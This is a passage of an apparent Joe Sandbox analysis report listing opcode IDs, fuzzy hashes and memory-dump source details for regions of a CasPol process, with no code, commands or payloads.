                                                                                      • Opcode ID: c5cdf19e6527f0a157ea64cb9ecb5841f539be1833ab30f3a1e696049e31caf3
                                                                                      • Instruction ID: 63cf93da832db8854171d228c597a26cd7e25fbe30fa682d2a2cfe578bd1ab6a
                                                                                      • Opcode Fuzzy Hash: c5cdf19e6527f0a157ea64cb9ecb5841f539be1833ab30f3a1e696049e31caf3
                                                                                      • Instruction Fuzzy Hash: 4C41E4313052969FDB068F24E894A9F3FB2FF89311F044169F909CB262CB35D921CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f0c1152b9d625cef4d1e499858146bcfa6bb92918cde017de6b2591256b46658
                                                                                      • Instruction ID: af50179a623e091c65c0f6501d141b16284e6bf7a9ab337f24d2685b23744f9c
                                                                                      • Opcode Fuzzy Hash: f0c1152b9d625cef4d1e499858146bcfa6bb92918cde017de6b2591256b46658
                                                                                      • Instruction Fuzzy Hash: 97315E35706A108FC701CF68E884A867BA5EF4A330B5943A5E92ACF3E2D730ED51CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0775e9519a771f0797064542855cf9dcbadda71cffa277016ede6de4ad5b0f5
                                                                                      • Instruction ID: c938304574b8beb87dcaeee860801830c05ffa64468868fe276786ecf487a88c
                                                                                      • Opcode Fuzzy Hash: e0775e9519a771f0797064542855cf9dcbadda71cffa277016ede6de4ad5b0f5
                                                                                      • Instruction Fuzzy Hash: CE2138307042538BD70A1636B8949BF77E6EFC52687068139D502CF795EE2DCD02D391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 535290b44760c2adc18cd2f474874db5ab3bfc35e70d600917af03c4be73756a
                                                                                      • Instruction ID: 855bab2954da816bc55174a5c0c13acbec40483157a094233e882ab296644f4d
                                                                                      • Opcode Fuzzy Hash: 535290b44760c2adc18cd2f474874db5ab3bfc35e70d600917af03c4be73756a
                                                                                      • Instruction Fuzzy Hash: 3721F5307041678BE7091636E494A6F369BEFC4658F158038D906CF794EF2EDD429391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d75862f57044e4ac46ced7160d5837dcf318838562034f354c0737afcd51e49
                                                                                      • Instruction ID: 4102610fdc89c38c23b01e3972ac65b6491e1cd3530b6e608d2822aa5f736f23
                                                                                      • Opcode Fuzzy Hash: 4d75862f57044e4ac46ced7160d5837dcf318838562034f354c0737afcd51e49
                                                                                      • Instruction Fuzzy Hash: 5C31E574E0424A8FCB00DFA8E5849DEBBF2EF99314F558175D508EB351E731A846CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8222fb4b4ba01c44cdac534332571487146f1522c5c35e0af3d4d8de6a933542
                                                                                      • Instruction ID: cbd78d1ab98b81ccdfa9859f0306762aa118a9520ecc05fa37feef3b4e7bc26a
                                                                                      • Opcode Fuzzy Hash: 8222fb4b4ba01c44cdac534332571487146f1522c5c35e0af3d4d8de6a933542
                                                                                      • Instruction Fuzzy Hash: 151157343016114FC31A8A39D89496FBBA5FFC566070502B8EA0ACB361CF21EC02C7D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e79c17d0a310844f963ab703215b5a48f314d7134c2bc487067bee4d5a847dae
                                                                                      • Instruction ID: 2adb2a0736189ef3503be9465af07985ba03c9a48b6597c91ee3eef9b0ea0229
                                                                                      • Opcode Fuzzy Hash: e79c17d0a310844f963ab703215b5a48f314d7134c2bc487067bee4d5a847dae
                                                                                      • Instruction Fuzzy Hash: 021191B5E0425A9FCB00DFA9E8405EFBFF9FF88211F00412AE515E7241D7749A15CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb7059e829e10d4afcd76dbfd407d6fdc622de9142ddb7e40a338d11f24c44a1
                                                                                      • Instruction ID: 479aafb4ee220dda8be0670a576872b1e488672475df7a0efcff1f681247e669
                                                                                      • Opcode Fuzzy Hash: fb7059e829e10d4afcd76dbfd407d6fdc622de9142ddb7e40a338d11f24c44a1
                                                                                      • Instruction Fuzzy Hash: 0B110D74F00629DFCB40DFB9C48899E77F5BB8C6117108529D50AD3314EB359D168B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce708538f4156483a7fad19bd6bd0395dfb12e31651910ac477882aef21bd90e
                                                                                      • Instruction ID: ce01a264b363c5f677e25c267301072485d13897ba4dee85770ff7a205a33714
                                                                                      • Opcode Fuzzy Hash: ce708538f4156483a7fad19bd6bd0395dfb12e31651910ac477882aef21bd90e
                                                                                      • Instruction Fuzzy Hash: 730126327001256BDB058EA8AC00AEF3BEBFBC8750B088039F605C7254DE769C1297E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ea197136d3e3dfa0c9fa3fa95323af6cbae6b8451e15c35c70f047ec67bd907
                                                                                      • Instruction ID: 23dcf47e97c24122313622dc0cb4d287b03d34e902a99ea044c2456d03919e15
                                                                                      • Opcode Fuzzy Hash: 8ea197136d3e3dfa0c9fa3fa95323af6cbae6b8451e15c35c70f047ec67bd907
                                                                                      • Instruction Fuzzy Hash: A4F068313006208B87155A3FE444A5B77EEFFC4B613214179F606CB361EF65DD058794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49d59da229bcfd7e6632bd1920832ad1011ed533e4e32d31cfd1ffb8efee133f
                                                                                      • Instruction ID: 702466819554d3ac59d2f9d3316b795e8fae4d40b8e89137c33da3c302958064
                                                                                      • Opcode Fuzzy Hash: 49d59da229bcfd7e6632bd1920832ad1011ed533e4e32d31cfd1ffb8efee133f
                                                                                      • Instruction Fuzzy Hash: E6F0C8326001196BDB058E99EC10ADF3BA6FFC8751F148035F948C7254DA76D9229BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be7728e597ca21099c94207bbceb9445bc57d6aae172b0f7e2e4be6aa279f01d
                                                                                      • Instruction ID: 973b0d53b2dfb3da41aff7b25cdd67af64caef169400e27ee3e5cd8cdd4d7866
                                                                                      • Opcode Fuzzy Hash: be7728e597ca21099c94207bbceb9445bc57d6aae172b0f7e2e4be6aa279f01d
                                                                                      • Instruction Fuzzy Hash: 9C014F35E0036C8FCB00AFB9D58919EBBB5FB48361F448525E906DB204DB36655A8B81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78fa9d7adb5cb021b196911412816036cf813295f8ed7f0eb997fc6a2d4ba3a4
                                                                                      • Instruction ID: 603ad68483cf60512be80a8e65e572605645d126746e6a5fadc053c2fb65743d
                                                                                      • Opcode Fuzzy Hash: 78fa9d7adb5cb021b196911412816036cf813295f8ed7f0eb997fc6a2d4ba3a4
                                                                                      • Instruction Fuzzy Hash: EDF0E5B6E00118AF8B40DBBDD8441EF7BF9FA88624B040176E509E3301DA314A138BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 11bd3a1ea9da4250e3328919ee9c812beacf54c0edb0fec9b96fc17a728aeb3d
                                                                                      • Instruction ID: b692a99f42e94d840a7286a31a9c90d74c7ab527c4c50dd22deea1019cf8d92b
                                                                                      • Opcode Fuzzy Hash: 11bd3a1ea9da4250e3328919ee9c812beacf54c0edb0fec9b96fc17a728aeb3d
                                                                                      • Instruction Fuzzy Hash: 94E01539B001688BCF00EBBDD88889CB3F1BB886217018024E90AE3314EF3498168B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf4ac54247baef42df13f4ba3ccec74a1590d339a10c66f280f2c6c7cd9ac0d4
                                                                                      • Instruction ID: 05f250a4fa53e36c30ac786ca78be9e4751af4174abb9ecbf8289bb819682f87
                                                                                      • Opcode Fuzzy Hash: cf4ac54247baef42df13f4ba3ccec74a1590d339a10c66f280f2c6c7cd9ac0d4
                                                                                      • Instruction Fuzzy Hash: DDE048B2E001299F8750DBBD99445FF7BF9FA8C661B054176E50DD3300EB314A128BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cb27e85d274165c6ca3255b140b397cd0bd4fbb391e7e4bdf4d4d228c0847b73
                                                                                      • Instruction ID: 23e2cbc962ebc8b764b23acec3433486cb988258f8dbdfbbce693b0b944e5653
                                                                                      • Opcode Fuzzy Hash: cb27e85d274165c6ca3255b140b397cd0bd4fbb391e7e4bdf4d4d228c0847b73
                                                                                      • Instruction Fuzzy Hash: BFD0EC35B006248BDB58DB79E8D41AEB776FBC8212B118079D00A93105CF7519168F00
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \;k$\;k$\;k$\;k
                                                                                      • API String ID: 0-2739306711
                                                                                      • Opcode ID: b9020050242718d387c3366ea09ab03c54a61629e6f76a06ba545e7be2a0b3cd
                                                                                      • Instruction ID: 6be75b755e089aec00d6276c9ba1fb5b316309091fbdaf6638d74639080a6402
                                                                                      • Opcode Fuzzy Hash: b9020050242718d387c3366ea09ab03c54a61629e6f76a06ba545e7be2a0b3cd
                                                                                      • Instruction Fuzzy Hash: 4F01A2327004158F87248E7DE440A5B73E6EF897A072A427AF548CF378DA71EC41D7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%